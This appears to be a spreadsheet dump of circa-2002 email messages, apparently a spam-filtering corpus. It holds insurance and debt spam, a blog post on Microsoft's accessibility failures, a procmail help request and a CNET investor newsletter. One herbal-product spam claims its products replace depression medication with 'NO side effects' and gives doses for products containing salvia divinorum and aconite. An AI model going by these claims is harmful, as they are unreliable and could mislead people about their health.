 ISWL-7, ISWL-21,ISWL-25, ISWL-210) is underwritten by Monumental Life
 Insurance Company. Rider costs and features vary according to state. FOR
 BROKER USE ONLY. Not approved for use with the general public as
 advertisement for purchase of annuity or insurance coverage. 0602ANFG21=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_18E22D_01C238B0.6EDF1B30
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;An Innovative Plan for Today's Market&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#336699" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/nfg/fps/20020424-1111a.gif" width=3D"550" =
 height=3D"42" alt=3D"First Year Bonus - 10% Commissions!"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nfg/fps/20020424-1111b.gif" =
 width=3D"550" height=3D"43" alt=3D"Guaranteed Return of Premium"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"354"&gt;&lt;img =
 src=3D"http://iiq.us/images/nfg/fps/20020424-11.jpg" width=3D"354" =
 height=3D"239"&gt;&lt;/td&gt;
                 &lt;td align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/nfg/fps/20020424-1.gif" width=3D"190" =
 height=3D"232" alt=3D"Convert Tax Deferred to Tax Free =
 Benefits&amp;#10;Access to death benefit for LTC benefits&amp;#10;72 Hour =
 Approval (in most cases)&amp;#10;Free E&amp;O Coverage"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/images/nfg/fps/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nfg/fps/20020424-2.gif" =
 width=3D"496" height=3D"75" alt=3D"An Innovative Plan Designed for =
 Today's Market"&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
             &lt;b&gt;Give your clients what they want and need: &lt;/b&gt;Guaranteed =
 Death Benefits=20
             and Long Term Care Benefits without expensive AND continuous =
 Long=20
             Term Care Premiums.&lt;br&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nfg/fps/spacer.gif" =
 align=3D"left" height=3D"42" width=3D"69"&gt;=20
             &lt;font color=3D"#000066"&gt;&lt;b&gt;&amp;#149;&amp;nbsp;Lifetime =
 Guarantees&lt;br&gt;
             &amp;#149;&amp;nbsp;Return of Premium Guarantees for single pay =
 plans&lt;br&gt;
             &amp;#149;&amp;nbsp;Convert Tax Deferred to Tax Free =
 Benefits&lt;/b&gt;&lt;font size=3D"1"&gt; (for your clients' =
 heirs).&lt;/font&gt;&lt;/font&gt;&lt;br&gt;
             &lt;br&gt;
             &lt;b&gt;Simplified Underwriting&lt;/b&gt; - Non-medical, no blood, no =
 urine,=20
             no ekg. Have your clients complete a 6 question application, =
 fax to=20
             underwriting and generally within 72 hours you will have =
 status.&lt;br&gt;
             &lt;/font&gt;=20
             &lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, Sans-serif" size=3D"2"&gt;&lt;b&gt;
             Call or &lt;a =
 href=3D"mailto:marketing@nationalfinancialgroup.com"&gt;e-mail&lt;/a&gt; us =
 Today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/nfg/fps/20020424-3.gif" =
 width=3D"523" height=3D"73" alt=3D'800-833-7427'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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value=3D"marketing@nationalfinancialgroup.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"NFG Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;=20
             &lt;p&gt;&lt;a href=3D"http://www.nationalfinancialgroup.com"&gt;&lt;img =
 src=3D"http://iiq.us/images/nfg/fps/20020424-5.gif" width=3D"515" =
 height=3D"76" alt=3D"National Financial Group" border=3D"0"&gt;&lt;/a&gt;&lt;/p&gt;
             &lt;p&gt;&lt;b&gt;&lt;font size=3D"4" color=3D"#FF0000"&gt;The Future Series =
 Convention March 2003.&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
               &lt;b&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif" =
 color=3D"#0000FF"&gt;
               Join us in Maui during PRIME SEASON - An experience you =
 will never forget!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p align=3D"left"&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, =
 sans-serif"&gt;*Up to $500,000=20
               maximum; $25,000 must remain in policy after this benefit =
 is exercised.=20
               **10% commission on single pay plan ages 45 - 80. =
 ***Single Pay=20
               Plans Only. Product and certain features not available in =
 all states.=20
               The Future Protector Series (policy form ISWL-1, ISWL-5, =
 ISWL-7,=20
               ISWL-21,ISWL-25, ISWL-210) is underwritten by Monumental =
 Life Insurance=20
               Company. Rider costs and features vary according to state. =
 FOR BROKER=20
               USE ONLY. Not approved for use with the general public as =
 advertisement=20
               for purchase of annuity or insurance coverage. 0602ANFG21 =
 &lt;/font&gt;&lt;/p&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_18E22D_01C238B0.6EDF1B30--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Microsoft redesign
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#microsoft_redesign
 Date: 2002-10-03T14:42:29-05:00
 _Jeffrey Zeldman_: Party like it's 1997[1]. &amp;#8220;Microsoft has redesigned. 
 Its new layout uses font tags and other deprecated junk straight out of the 
 mid-1990s. ... When a W3C member company that helped create XHTML and CSS 
 ignores or misuses those web standards on its corporate site, you have to 
 wonder who didn't get the memo.&amp;#8221; 
 The new design also fails even the most basic accessibility tests[2]; the home 
 page contains 80 instances of images without ALT text. This is the same basic 
 failing for which the Sydney Organizing Committee for the Olympic Games was 
 successfully sued in 2000[3]. 
 Here is what microsoft.com looks like in a text-only browser[4]. (To better 
 understand the experience, take a piece of paper and cover your entire monitor 
 except for the top line, then scroll the window slowly so you can only read one 
 line at a time.) While nothing is technically locked out (all the links are 
 regular links, nothing requires Javascript to function properly), all the 
 un-ALT-enhanced images (which are mostly spacer images and images-as-bullets) 
 add so much clutter to the page that it's very difficult to navigate. 
 Meanwhile, I don't want to imagine what it would sound like through a screen 
 reader. Want to find the search box? That's &amp;#8220;1pttrans dot gif 1pttrans 
 dot gif search for 1pttrans dot gif 1pttrans dot gif form edit box 1pttrans dot 
 gif submit button go 1pttrans dot gif link advanced search 1pttrans dot gif 
 ...&amp;#8221; And I hope you weren't looking for Microsoft's accessibility home 
 page[5]; it's the 76th link on the page (out of 76).
 [1] http://www.zeldman.com/daily/0902b.html#prince
 [2] http://bobby.watchfire.com/bobby/bobbyServlet?advanced=true&amp;URL=http%3A%2F%2Fwww.microsoft.com%2F&amp;gl=wcag1-a&amp;Text=text&amp;line=line&amp;an_errs=an_errs&amp;stealth=Bobby%2F3.3&amp;output=Submit
 [3] http://www.contenu.nu/socog.html
 [4] http://diveintomark.org/public/microsoft_lynx_output.txt
 [5] http://www.microsoft.com/enable/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Right-wing governments 'increase suicide rates'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8045344,1440/
 Date: Not supplied
 Over the last century, an "extra" 35,000 suicides occurred under Tory rule in 
 the UK - a similar effect is apparent in Australia
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Have You Never Been Mellow?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Greetings &amp; Blessings To You!
 Offering for your "Sensitive" Delight: 
 1. "Seventh Heaven" Kathmandu Temple Kiff (tm); a viripotent cannabis alternative for blissful regressions of vexatious depressions... 
 2.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
 3. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living... 
 4. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...
 *********************************************
 Kathmandu Temple Kiff is a proprietary; Nepalese, sensitive, pipe-smoking/stoking substance. Kathmandu Temple Kiff is indeed the most substantial marijuana/cannabis alternative on the planet.
 Absolutely Legal!  Marvelously Potent!
 Kathmandu Temple Kiff possesses all of the positive virtues fine ganja/cannabis without any of the negatives.  An amalgamation of high concentrates of rare euphoric herbas, Kathmandu is offered in a solid jigget/bar format and is actually more UPLIFTING &amp; POISED than cannabis / marijuana while rendering Euphoria, Happiness, Mood-Enhancement, Stress/Depression Relief and promoting contemplativeness, creativity, better sleep, lucid dreaming ... and enhancing the sexual experience!!!
 Kathmandu Temple Kiff is simply the best and just a little pinch/snippet of the Kathmandu goes a long, "sensitive" way.  Just 4 or 5 draws of the pipe ... (an herb pipe included with each package of Kathmandu Temple Kiff).
 PLEASE NOTE:  Although no botanical factor in Kathmandu Temple Kiff is illegal or considered to be harmful by regulatory agencies and no tobacco is included therein, it is the policy of our company that Kathmandu Temple Kiff may not be offered or sold to any person that has not attained at least 21 years of age.
 Ingredients:  
 Kathmandu Temple Kiff is both a euphoriant and an uplifting, calmative relaxant that offers scintillating physical and cerebral ambiance enhancement. Kathmandu Temple Kiff is a proprietary, prescribed amalgamation which includes the following synergistically, synesthesia conglomerated, uncommon herbs, resins, essences, flower-tops and oils in extreme ratio extractment ranging from 8.5 to 1. to 60 to 1, viripotent concentrations : Drachasha, Chavana Prash, Trikatu, Black Seed Herb, Capillaris Herba, Angelica Root, Wild Dagga, Haritaki, Shatavari, Labdunum, Neroli, Unicorn Root, Papaver Rhoes, Dendrobian, Calea Zacalechichi, Rue, Amla, Salvia Divinorum, Crocus Sativa, Lotus and Gokshura.
 *********************************************
 SWEET VJESTIKA APHRODISIA DROPS (tm) TANTRA PLEASURE SACRAMENT
 Indeed; a HeavenSent Treasure of Pleasure!!  
 To entice your Passion, 
 To intrigue your Desire,
 Enchantment's Rapture;
 Sweet Vjestika Fire....
 SWEET VJESTIKA APHRODISIA DROPS EXTRAVAGANTLY INSPIRES AND ENHANCES:
 *Penile &amp; clitoral sensitivity
 *Sensitivity to touch
 *Desire to touch
 *Desire to be touched
 *Fantasy
 *Lust
 *Rapture
 *Erogenous sensitivity
 *Uninhibitedness
 *Sexual courageousness
 *Sexual gentleness and ferocity
 SWEET VJESTIKA APHRODISIA DROPS(tm)
 *Prolongs and intensifies foreplay;
 *Prolongs and intensifies orgasm / climax;
 *Inspires body, mind, spirit orgasm / climax;
 *Inspires and enhances body, mind, spirit communion betwixt lovers;
 *Inspires and enhances the enchantment / glamourie of Love....
 Sweet Vjestika is a Chimera Tantric proprietary glamourie / enchantment Fantasia Amalgamation for men and women, comprised of high ratio extracts derived from the following Herbs of Power which are master blended to emphasis extravaganza body, mind, spirit erogenous sensory awareness and gourmet carnal delight.  
 CONTENTS:
 Whole MaHuang, Bee Pollen, Epimedium Angelica, Rehmannia, Ginger, Schizandra, Polygonatum, Adenophora, Tremella, Tang Kuei, Reishi, Codonopsis, Eucommium, Lycii Berry, Ligusticum, Peony Root, Fo Ti, Atractylodes, Ophiopogon, Royal Jelly, Euryales Seeds, Poria, Licorice, Mountain Peony Bark, Cormi Fruit, Rose Hips, Prince Ginseng, Scrophularia, Alisma, Astragalus, Fennel, Buplerium, Cypera, Aconite, Polygala, Red Sage Root, Jujube Seed, Lotus Seed, Tien Chi Ginseng, Ligus Ticum, Psoralea, Dodder Seed, and Cisthanches in a solution containing 24% pure grain alcohol as a preservative, distilled water and Lecithen as an emulsifier. 
 SUGGESTED USAGE:
 Sweet Vjestika is extremely potent.  Use 10  15 drops sublingually or in juice or tea, not to exceed 25 drops.  Best when taken upon an empty stomach approx. 45 minutes before intimacy.  Based upon 25  drop increments there are approx. 60 dosages per 1 oz. bottle.  Usage should not exceed 2 doses per week.  Persons taking any precsription medication or suffering from depression or anxiety, should consult with their health care provider before using.  This product is not intented for usage by persons with abnormal blood pressure or any cardiovascular malady or any thyroid dysfunction.  Nor is it to be used during pregnancy or by any person under 21 years of age.  
 *********************************************
 Also for your sensitive mellowness.... "Seventh Heaven" Prosaka Tablets are an entirely natural, proprietary, botanical prescription comprised of uncommon Asian Herbs for Calm, Balance, Serenity and Joyful Living. "Seventh Heaven" Prosaka is indeed a most extraordinary, viripotent, calming, centering, mood-enhancing, holistically-formulated, exotic herbaceous alternative to pharmaceutical medications for depression, anxiety, stress, insomnia, etc.
 NO side effects!  NO dependency!  Vivaciously Mellow!
 There is ABSOLUTELY nothing else quite like "Seventh Heaven" Prosaka (tm).
 Ingredients:
 Seventh Heaven Prosaka tablets contain the following herbal factors in precise prescription: Tadix Salviae, Sensitive Mimosa Bark, Arullus Euphoriae, Shizandra, Frutcus Mori, Caulis, Polygoni Multiflori, Zizphus, Tang Kuei, Cedar Seed, Sweetflag Rhizome, Cuscutae, Amber, Radix Scutellariae, Evodia, Longan, Arizisaema, Cistanches, Radix Polygalae, Red Sage Root and Eucommia.  Recommended dosage: 1-2 tablets; 2-3 times per day.
 **********************************************
 Also.... for your "Sensitive" "Pure Energy" Energization.... "Seventh Heaven" Gentle Ferocity Tablets (tm).  A "Seventh Heaven" non-caffeine, non-ephedrine, non-ephedra, non-MaHuang; viripotent, herbaceous prescription for the dynamic energization of body, mind and spirit.  
 This Gentle Ferocity Formulation is amalgamated in accordance with the fundamental Taoist herbal principle of botanical interactiveness and precursorship which in essence is a molecular equation of the relevant botanical/herbal alkaloids and glycosides interacting with one another to prolificate molecular communion and thereby to achieve demonstrative herbal efficaciousness without negative implication to any aspect of human composition.  These Gentle Ferocity Cordial Tablets are incredulously and thoroughly effective.  Enjoy!
 Attention!  Attention!!
 For those of you who seek to achieve most demonstrative/non-invasive/non-prohibitive appetite suppression without the negative implications of ongoing usage of MaHuang Herb, Ephedra/Ephedrine or Caffeine as are so magnaminously utilized in a multitude of herbal "diet aids" entitled as "Thermogenics" ... this is ABSOLUTELY the herbal agenda/product for you!!
 Entirely Natural! Increases Energy! Increases Metabolism! Decreases Appetite!
 Contents:
 Each Gentle Ferocity Tablet contains 500 mg. of the following proprietary formulated, high-ratio concentrated botanical factors ... Cortex Eucommiae, Radex Polygoni Multiflori, Zizyphus Seed, Fructus Schisandrae, Radix Panax Ginseng, Radix Astragali, Atractylode, Sclerotium, Porial Cocos, Saussurea Tang Kuei, Longan, Radix Paeoniae, Biota Seeds, Glehnia, Radix Salviae, Ligusticum, Lycu Berry, Radix Dioscoreae, Cortex Mouton, Frutcus Corni, Radix Polygalae, Cistanches, Radix Pseudoslellariae and Cortex Aranthopanacis.  Recommended dosage: One to two
 tablets as needed.
 ========================================
 PRICING INFORMATION:
 1.      SEVENTH HEAVEN KATHMANDU TEMPLE KIFF (tm)
 One     .75 oz. jigget/bar          $65.00
 One    2.0 oz. jigget/bar          $115.00 (Free Capillaris Herba with 2.0 oz. bar. Refer to Capillaris paragraph at end of text)
 2.     SWEET VJESTIKA APHRODISIA DROPS (tm)
 One	1.0 oz. bottle		$90.00   
 Two	1.0 oz. bottles	       $140.00  
 3.     SEVENTH HEAVEN PROSAKA (tm)
 One    100 tablet tin          $40.00
 Three  100 tablet tins        $105.00
 Six    100 tablet tins        $185.00
 4.     SEVENTH HEAVEN GENTLE FEROCITY (tm)
 One   300 tablet jar          $130.00
 5.     SWEET APHRODISIA INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; one, 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.  For $150.00 (Reg. $205.00  Save $55)  (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 6.     BODY, MIND, SPIRIT "HEAVENLY" INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka.  For $125.00 (Reg. $155.00  Save $30) (Free Capillaris Herba with this intro offer.  Refer to Capillaris paragraph at end of text)
 7.     "PURE ENERGY" INTRO COMBINATION OFFER 
 Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity.  For $170.00 (Reg. $245.00  Save $75)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text)
 8.     "SENSITIVE" PREFERENTIAL INTRO COMBINATION OFFER
 Includes one, 2.0 oz. jigget/bar of Kathmandu Temple Kiff &amp; 1 tin (100 tablets) of Seventh Heaven Prosaka &amp; 1 jar (300 tablets) of Seventh Heaven Gentle Ferocity For $200.00 (Reg. $285.00  Save $85)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 9.     ULTIMATE HERBACEOUSNESS INTRO COMBINATION OFFER
 Includes one - 2.0 oz. jigget / bar of Kathmandu Temple Kiff, one - 1 oz. bottle of Sweet Vjestika Aphrodisia Drops, one - 100 tablet tin of Prosaka, and one - 300 count jar of Gentle Ferocity for a deep discounted Retail Price of $260.00 (Reg. $375.00  Save $115)  (Free Capillaris Herba with this intro offer Refer to Capillaris paragraph at end of text.)
 SPECIAL OFFER:  For a limited time only, you will receive a FREE personal brass hookah with the Ultimate Herbaceous Intro Offer as our gift to you.  This hookah has a retail value of $25.00. 
 **************************************************
 ORDERING INFORMATION:
 For your convenience, you can call us direct with your orders or questions.
 Call 1-623-972-5999
 Mon.  Fri. 10:30 am to 7:00 pm (MT) 
 Sat. - 11:00 am to 3:00 pm (MT)
 For all domestic orders, add $5.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.
 LIVE sales associates are awaiting your call.  Be sure to ask about our brand new offering, Equivalence Tablets and Dragon Wing Remedy Spray.  These "Dynamic Duo" products are without peer for managing pain due to problems such as chronic pain, Fibromyalgia and Arthritis!
 **************************************************
 SPECIAL DISCOUNT &amp; GIFT
 Call now and receive a FREE botanical gift!  With every order for a 2.0 oz. jigget / bar of Kathmandu Temple Kiff or one of our four (4) Intro Combination Offers, we will include as our free gift to you ... a 2.0 oz. package of our ever so sedate, sensitive Asian import, loose-leaf Capillaris Herba for "happy" smoking or brewing ... (a $65.00 retail value).
 ====================================================
 To be removed from this mailing list, send an email with REMOVE in the subject line to: gordon795@runbox.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: Accepting Credit Cards (Faq) [g1010pn]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] procmail help
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm fairly confused here, with Procmail. 
 I know this isn't a procmail list per-se; feel free to answer my questions in 
 private email to r_gilmanhunt@hotp.com.  
 I've looked for web-stuff to answer this question but I can't find anything 
 specific on this scenario.
 Here's the situation. 
 I have a global /etc/procmailrc file. It works, and when I insert stuff into 
 it for logging (LOGFILE=/root/procmail.log, VERBOSE=yeah. LOGABSTRACT=all) it 
 shows up where I expect it to (the log in /root/procmail.log)  At the end of 
 this file, I use 
  :0fw
  | spamc
 to call spamassassin.
 Also in it is a carboncopy recipe (yes, I know, it's one of the evils we do 
 for our corporate masters)  (at the top) (to their credit, I am instructed 
 that they are not interested in the actual contents, but are concerned about 
 future lawsuits and their culpability, so they want a record made. Discussion 
 on this point is immaterial)
 :0
   * ? test -d $ARCHIVEDIR/$DATEDIR || mkdir -p --mode=750 $ARCHIVEDIR/$DATEDIR
   { }
 :0 c
  $SAVEAT
 I have several users where I forward certain spams to /dev/null  . . .their 
 procmailrc file (/home/$user/.procmailrc) looks like this:
 :0
   * ^From: .*spermfun.com
   /dev/null
 Now I've got a person who needs a copy of her inbound emails sent to another 
 email address (outside the company), so I've got this recipe in her 
 /home/$user/.procmailrc file:
 :0 c
   !user@domain.tld
 It almost looks like procmail's not running a user's copy recipe after a 
 global copy recipe, except that I can replace that user's one with 
 :0 
  * ^Subject: .*test
   procmail.holder
 and get the same result.
 The result, to put it succinctly, is "nothing". No forwards go out, no files 
 are made, if I try to log information, no logs are set up. I've modified the 
 user/group and permissions to match known-working recipes (the spermfun 
 example above) and still nothing.  However, I can redirect those other 
 messages.  In other words- just this user's procmailrc file is not working- 
 other users have no problems.
 Any suggestions would be helpful :) 
 -Russ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</si>
  <si>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Get out of debt quick!                                        4179uKlj5-057SXua1524UHkC5-900-28
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;P ALIGN=CENTER&gt;&lt;font ptsize="14" family="SANSSERIF" lang="0" face="Arial" size="2" color="#CCCCFF"&gt;kenya&lt;/font&gt;&lt;FONT  SIZE=4 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;BR&gt;
 Do you have too much debt?&lt;BR&gt;
 &lt;BR&gt;
 Would you like to lower your monthly payments &lt;BR&gt;
 and save money?&lt;BR&gt;
 &lt;BR&gt;
 Let us help you &lt;A HREF="http://www.irnman.net/debt/"&gt;click here&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/FONT&gt;
 &lt;P ALIGN=LEFT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;If you would like to be taken off our list, &lt;A HREF="http://www.irnman.net/debt/rem.htm"&gt;click here&lt;/A&gt;&lt;/P&gt;&lt;/FONT&gt;
 &lt;p ALIGN="center"&gt;&lt;font style="background-color: #ffffff" back="#ffffff" size="2" ptsize="10" family="SANSSERIF" face="Arial" lang="0" color="#CCCCFF"&gt;2170uzHA6-646nlhK0895SDnb0-294BCPgl32&lt;/font&gt;&lt;/p&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEWS.COM INVESTOR: Techs rise, but Dow falls on day of Bush speech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</si>
  <si>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href="http://clickthru.online.com/Click?q=77-u6h6IIpsCwLNfgwx31g9NPmdZPPR"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href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhwV19YbVFm8il40AWNdR" &gt;My Portfolio&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKIjjMduFGkeHaXeD3gBcR" &gt;Broker Reports&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyZmu18uoT_PUCch20LgRR" &gt;IPOs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsr-vkFnINyXYHRf_uaHkFR" &gt;Splits&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &amp;#149; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDHKLpSGtkkPhB7mxUT9A9R" &gt;Messages&lt;/a&gt;&lt;/b&gt;
 &lt;/font&gt;
 &lt;!-- /nav --&gt;
 &lt;p&gt;
 &lt;!-- tech winners --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_win.gif" width=160 height=20 alt="Tech Winners"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrVvXjPxCYYRGOT9_JmpRR" &gt;SGMA&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.43&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;29.43%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zcRTV0aGftmZCtvxYhFR" &gt;APHT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.17&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;24.11%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEyF4Y4OtR-pp7us2Qf9R" &gt;ZOMX&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.28&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;22.29%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIziyKo1gkKNXLTSyPWc3uR" &gt;ICTS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;6.45&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;19.42%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_up.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJUEE-2FsxoLkkTKhn-yR" &gt;CAFE&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.97&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;18.33%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_Z-X7Vl6fez6pa6cIJPR" &gt;STIZ&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.351&lt;/td&gt;
